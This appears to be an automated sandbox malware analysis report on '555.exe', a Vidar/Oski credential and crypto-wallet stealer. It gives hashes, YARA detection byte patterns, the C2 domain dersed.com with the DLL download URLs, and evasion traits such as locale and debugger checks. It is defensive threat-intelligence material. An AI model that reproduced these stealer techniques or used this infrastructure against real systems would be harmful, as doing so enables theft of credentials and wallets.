Edit tour

Windows Analysis Report
555.exe

Overview

General Information

Sample Name:	555.exe
Analysis ID:	594633
MD5:	ed37ebbe1746dd0d566c8c4769655e0b
SHA1:	0a559ebf6ab1cdf292c79aac5ac20c236d975eb7
SHA256:	b4c9aadd18c1b6f613bf9d6db71dcc010bbdfe8b770b4084eeb7d5c77d95f180
Tags:	ArkeiStealerexeVidar
Infos:

Detection

Oski Stealer Vidar

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Oski Stealer

Antivirus / Scanner detection for submitted sample

Yara detected Vidar stealer

Multi AV Scanner detection for domain / URL

Injects a PE file into a foreign processes

Country aware sample found (crashes after keyboard check)

Found many strings related to Crypto-Wallets (likely being stolen)

Uses 32bit PE files

Yara signature match

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Uses the system / local time for branch decision (may execute only at specific dates)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains functionality to enumerate network shares

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains an invalid checksum

Extensive use of GetProcAddress (often used to hide API calls)

PE file contains strange resources

Contains functionality to read the PEB

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Checks if the current process is being debugged

Found evaded block containing many API calls

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Found large amount of non-executed APIs

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

555.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\555.exe" MD5: ED37EBBE1746DD0D566C8C4769655E0B)

555.exe (PID: 6444 cmdline: C:\Users\user\Desktop\555.exe MD5: ED37EBBE1746DD0D566C8C4769655E0B)

WerFault.exe (PID: 6864 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6444 -s 1228 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000000.296551776.0000000000474000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
00000003.00000000.296551776.0000000000474000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	Vidar	Vidar Payload	kevoreilly	0x1056:$decode: FF 75 0C 8D 34 1F FF 15 9C 41 47 00 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8 0x75b10:$wallet: walle.dat
Process Memory Space: 555.exe PID: 6192	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
Process Memory Space: 555.exe PID: 6192	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: 555.exe PID: 6444	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
Process Memory Space: 555.exe PID: 6444	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 555.exe PID: 6444	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.555.exe.400000.4.raw.unpack	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
3.0.555.exe.400000.4.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.0.555.exe.400000.4.raw.unpack	Vidar	Vidar Payload	kevoreilly	0x1056:$decode: FF 75 0C 8D 34 1F FF 15 9C 41 47 00 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8 0x75b10:$wallet: walle.dat
3.2.555.exe.400000.0.unpack	JoeSecurity_Oski_1	Yara detected Oski Stealer	Joe Security
3.2.555.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.555.exe.400000.0.unpack	Vidar	Vidar Payload	kevoreilly	0x456:$decode: FF 75 0C 8D 34 1F FF 15 9C 41 47 00 8B C8 33 D2 8B C7 F7 F1 8B 45 0C 8B 4D 08 8A 04 02 32 04 31 47 88 06 3B 7D 10 72 D8 0x74310:$wallet: walle.dat
Click to see the 1 entries

Sigma Signatures

There are no malicious signatures, click here to show all signatures.

Source: Process started

Author: frack113: Data: Command: C:\Users\user\Desktop\555.exe, CommandLine: C:\Users\user\Desktop\555.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\555.exe, NewProcessName: C:\Users\user\Desktop\555.exe, OriginalFileName: C:\Users\user\Desktop\555.exe, ParentCommandLine: "C:\Users\user\Desktop\555.exe" , ParentImage: C:\Users\user\Desktop\555.exe, ParentProcessId: 6192, ProcessCommandLine: C:\Users\user\Desktop\555.exe, ProcessId: 6444

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 555.exe	Virustotal: Detection: 71%	Perma Link
Source: 555.exe	Metadefender: Detection: 41%	Perma Link
Source: 555.exe	ReversingLabs: Detection: 78%

Antivirus / Scanner detection for submitted sample

Source: 555.exe

Avira: detected

Multi AV Scanner detection for domain / URL

Source: http://dersed.com/freebl3.dll

Virustotal: Detection: 5%

Perma Link

Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0040A053 _memset,CryptStringToBinaryA,_memmove,	3_2_0040A053
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_004108CF __EH_prolog3,_malloc,_memmove,CryptUnprotectData,	3_2_004108CF
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0040D053 __EH_prolog3,_malloc,_memmove,CryptUnprotectData,	3_2_0040D053
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0040D3A5 __EH_prolog3,_malloc,_memmove,CryptUnprotectData,	3_2_0040D3A5

Source: 555.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: C:\Users\user\Desktop\555.exe

Code function: 0_2_00408B20 mmioSeek,mmioDescend,mmioDescend,mmioDescend,mmioSeek,mmioClose,CreateFileA,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,CloseHandle,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,ClientToScreen,WindowFromPoint,GetActiveWindow,PlaySoundA,_TrackMouseEvent,GetDlgItem,lstrcpyW,GetCurrentDirectoryW,midiInGetNumDevs,midiInGetDevCapsA,midiInOpen,midiInStart,midiInClose,GetDlgItem,BeginPaint,GetClientRect,CreateFontA,SelectObject,DeleteObject,SetBkMode,DrawTextA,EndPaint,VirtualQuery,VirtualQuery,VirtualQuery,GetParent,SendDlgItemMessageA,SHAutoComplete,PostMessageA,_memset,InsertMenuItemA,lstrcpyW,NetUserEnum,lstrcpyA,lstrlenW,ImageList_DragMove,lstrcpyA,PathCompactPathA,lstrcpyA,lstrlenW,lstrcpyA,WideCharToMultiByte,NetApiBufferFree,MulDiv,CreateFontW,GetModuleHandleA,CreateWindowExA,SendMessageA,SendMessageA,GlobalAlloc,ExitProcess,LoadLibraryA,EnableWindow,GlobalAlloc,ExitProcess,DefDlgProcA,FindResourceA,SizeofResource,LoadResource,LockResource,CreateFileA,GetProcAddress,WriteFile,VirtualAlloc,CloseHandle,LoadBitmapA,lstrcatA,LoadLibraryA,GetProcAddress,WSACreateEvent,WSAWaitForMultipleEvents,ShowWindow,EnumChildWindows,ChooseFontA,CreateFontIndirectA,BeginPaint,SelectObject,TextOutA,EndPaint,DefWindowProcA,StartPage,GetTextMetricsW,PostQuitMessage,#17,CreateWindowExA,ImageList_LoadImageA,ImageList_LoadImageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetTextExtentExPointW,ExtTextOutW,_memmove,EndPage,GetLocalTime,GetTimeFormatW,SendMessageW,SendMessageW,SendMessageW,GetDateFormatW,SendMessageW,HideCaret,

0_2_00408B20

Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00411CE4 __EH_prolog3_catch_GS,__wgetenv,FindFirstFileW,	3_2_00411CE4
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00404BD7 __EH_prolog3,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,DeleteFileW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcatW,FindNextFileW,FindClose,	3_2_00404BD7
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0040F1C4 __EH_prolog3_GS,__wgetenv,FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,	3_2_0040F1C4
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00405291 __EH_prolog3,lstrcpyW,lstrcatW,lstrcatW,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,lstrcmpW,PathMatchSpecW,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,CreateDirectoryW,CopyFileW,FindNextFileW,FindClose,	3_2_00405291
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00453605 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,	3_2_00453605
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0040F72A __EH_prolog3_GS,__wgetenv,FindFirstFileW,GetFileAttributesW,FindNextFileW,	3_2_0040F72A

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_00405742 _strtok,_strtok,__wgetenv,__wgetenv,GetLogicalDriveStringsA,_strtok,GetDriveTypeA,_strtok,

3_2_00405742

Source: unknown

DNS traffic detected: query: dersed.com replaycode: Name error (3)

Source: 555.exe, 00000003.00000002.317520983.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/288
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/freebl3.dll
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/freebl3.dllyD
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/mozglue.dll
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/mozglue.dllkD
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/msvcp140.dll
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/msvcp140.dllGD
Source: 555.exe, 00000003.00000002.317520983.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp, 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/nss3.dll
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/nss3.dllcom/freebl3.dll
Source: 555.exe, 00000003.00000002.317520983.00000000007E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/nss3.dllv
Source: 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp, 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/softokn3.dll
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/softokn3.dllLD
Source: 555.exe, 00000003.00000002.317565007.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/softokn3.dllUD
Source: 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/softokn3.dllmb
Source: 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/vcruntime140.dll
Source: 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/vcruntime140.dllGc
Source: 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/vcruntime140.dll_i
Source: 555.exe, 00000003.00000002.317555951.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dersed.com/vcruntime140.dllbg
Source: 555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://ip-api.com/line/

Source: unknown

DNS traffic detected: queries for: dersed.com

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_00409559 __EH_prolog3,InternetSetFilePointer,InternetReadFile,_memmove,_memset,HttpQueryInfoA,CoCreateInstance,_memcpy_s,_memcpy_s,

3_2_00409559

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.0.555.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Vidar Payload Author: kevoreilly
Source: 3.2.555.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Vidar Payload Author: kevoreilly
Source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Vidar Payload Author: kevoreilly

Source: 555.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED

Source: 3.0.555.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Vidar author = kevoreilly, description = Vidar Payload, cape_type = Vidar Payload
Source: 3.2.555.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Vidar author = kevoreilly, description = Vidar Payload, cape_type = Vidar Payload
Source: 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Vidar author = kevoreilly, description = Vidar Payload, cape_type = Vidar Payload

Source: C:\Users\user\Desktop\555.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6444 -s 1228

Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00408B20	0_2_00408B20
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0040AC10	0_2_0040AC10
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00407DF0	0_2_00407DF0
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00438147	0_2_00438147
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00423130	0_2_00423130
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00430308	0_2_00430308
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0043943F	0_2_0043943F
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_004464D0	0_2_004464D0
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0043751A	0_2_0043751A
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00447649	0_2_00447649
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_004306F0	0_2_004306F0
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0042F703	0_2_0042F703
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00405900	0_2_00405900
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00437A6B	0_2_00437A6B
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00446AAD	0_2_00446AAD
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0042FB98	0_2_0042FB98
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00445DBF	0_2_00445DBF
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0042FF36	0_2_0042FF36
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00436FC9	0_2_00436FC9
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_00432FF6	0_2_00432FF6
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0045604F	3_2_0045604F
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0046E069	3_2_0046E069
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0046A18D	3_2_0046A18D
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0046A575	3_2_0046A575
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0044C530	3_2_0044C530
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0046E5BA	3_2_0046E5BA
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00456AB1	3_2_00456AB1
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0046EB0B	3_2_0046EB0B
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00454B1E	3_2_00454B1E
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0044AB25	3_2_0044AB25
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00426E19	3_2_00426E19
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00438FBA	3_2_00438FBA
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0046F1E7	3_2_0046F1E7
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00459280	3_2_00459280
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00469588	3_2_00469588
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_004157E1	3_2_004157E1
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_004477E7	3_2_004477E7
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00469A1D	3_2_00469A1D
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00429DA3	3_2_00429DA3
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00469DBB	3_2_00469DBB
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0043FE0C	3_2_0043FE0C
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00449EE7	3_2_00449EE7
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0046FFB0	3_2_0046FFB0

Source: C:\Users\user\Desktop\555.exe	Code function: String function: 00458B40 appears 59 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 004100F0 appears 57 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 004150F3 appears 37 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 00404150 appears 70 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 0040143A appears 59 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 004220AE appears 103 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 00422493 appears 44 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 0042A1F0 appears 49 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 004256B0 appears 85 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 00425719 appears 64 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 004223BB appears 39 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 00459097 appears 39 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 004032D8 appears 33 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 0042207B appears 67 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 00421ED1 appears 39 times
Source: C:\Users\user\Desktop\555.exe	Code function: String function: 0045F610 appears 59 times

Source: C:\Users\user\Desktop\555.exe

Code function: 0_2_04773914 NtQueryInformationProcess,

0_2_04773914

Source: 555.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 555.exe	Virustotal: Detection: 71%
Source: 555.exe	Metadefender: Detection: 41%
Source: 555.exe	ReversingLabs: Detection: 78%

Source: 555.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\555.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\555.exe "C:\Users\user\Desktop\555.exe"
Source: C:\Users\user\Desktop\555.exe	Process created: C:\Users\user\Desktop\555.exe C:\Users\user\Desktop\555.exe
Source: C:\Users\user\Desktop\555.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6444 -s 1228
Source: C:\Users\user\Desktop\555.exe	Process created: C:\Users\user\Desktop\555.exe C:\Users\user\Desktop\555.exe	Jump to behavior

Source: C:\Users\user\Desktop\555.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0000031A-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\555.exe

File created: C:\Users\user\AppData\Local\Temp\D601.tmp

Jump to behavior

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@4/4@7/1

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_00409559 __EH_prolog3,InternetSetFilePointer,InternetReadFile,_memmove,_memset,HttpQueryInfoA,CoCreateInstance,_memcpy_s,_memcpy_s,

3_2_00409559

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_004223F4 GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,

3_2_004223F4

Source: 555.exe, 555.exe, 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, 555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 555.exe, 555.exe, 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, 555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 555.exe, 00000000.00000002.291455838.00000000047B2000.00000004.00000800.00020000.00000000.sdmp, 555.exe, 00000000.00000002.292388271.00000000048A5000.00000004.00000800.00020000.00000000.sdmp, 555.exe, 00000000.00000002.292903464.0000000004B5B000.00000004.00000800.00020000.00000000.sdmp, 555.exe, 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, 555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 555.exe, 555.exe, 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, 555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: 555.exe, 555.exe, 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, 555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 555.exe, 555.exe, 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, 555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 555.exe, 555.exe, 00000003.00000000.294887526.0000000000474000.00000002.00000001.01000000.00000003.sdmp, 555.exe, 00000003.00000000.288286831.0000000000400000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_0042226B GetLastError,FormatMessageW,FormatMessageA,LocalFree,_free,

3_2_0042226B

Source: C:\Users\user\Desktop\555.exe

Code function: 3_2_0040A1D5 _malloc,CreateToolhelp32Snapshot,CloseHandle,Process32First,Process32Next,FindCloseChangeNotification,

3_2_0040A1D5

Source: C:\Users\user\Desktop\555.exe	Mutant created: \Sessions\1\BaseNamedObjects\d06ed635-68f6-4e9a-955c-4899f5f57b9a{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6444

Source: C:\Users\user\Desktop\555.exe

0_2_00408B20

Source: C:\Users\user\Desktop\555.exe	Command line argument: D"E	0_2_0040D360
Source: C:\Users\user\Desktop\555.exe	Command line argument: D"E	0_2_0040D360
Source: C:\Users\user\Desktop\555.exe	Command line argument: Win	0_2_0040D360
Source: C:\Users\user\Desktop\555.exe	Command line argument: HOMEDRIVE	0_2_0040D360
Source: C:\Users\user\Desktop\555.exe	Command line argument: HOMEPATH	0_2_0040D360
Source: C:\Users\user\Desktop\555.exe	Command line argument: Generator	0_2_0040D360
Source: C:\Users\user\Desktop\555.exe	Command line argument: Win	0_2_0040D360
Source: C:\Users\user\Desktop\555.exe	Command line argument: kk-KZ	3_2_00407BAB
Source: C:\Users\user\Desktop\555.exe	Command line argument: be-BY	3_2_00407BAB
Source: C:\Users\user\Desktop\555.exe	Command line argument: uz-UZ	3_2_00407BAB
Source: C:\Users\user\Desktop\555.exe	Command line argument: ru-RU	3_2_00407BAB
Source: C:\Users\user\Desktop\555.exe	Command line argument: az-AZ	3_2_00407BAB

Source: C:\Users\user\Desktop\555.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\555.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 555.exe

Static file information: File size 1304576 > 1048576

Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0042A235 push ecx; ret	0_2_0042A248
Source: C:\Users\user\Desktop\555.exe	Code function: 0_2_0042574F push ecx; ret	0_2_00425762
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_00458C18 push ecx; ret	3_2_00458C2B
Source: C:\Users\user\Desktop\555.exe	Code function: 3_2_0045F655 push ecx; ret	3_2_0045F668

Source: C:\Users\user\Desktop\555.exe

0_2_00408B20

Source: 555.exe

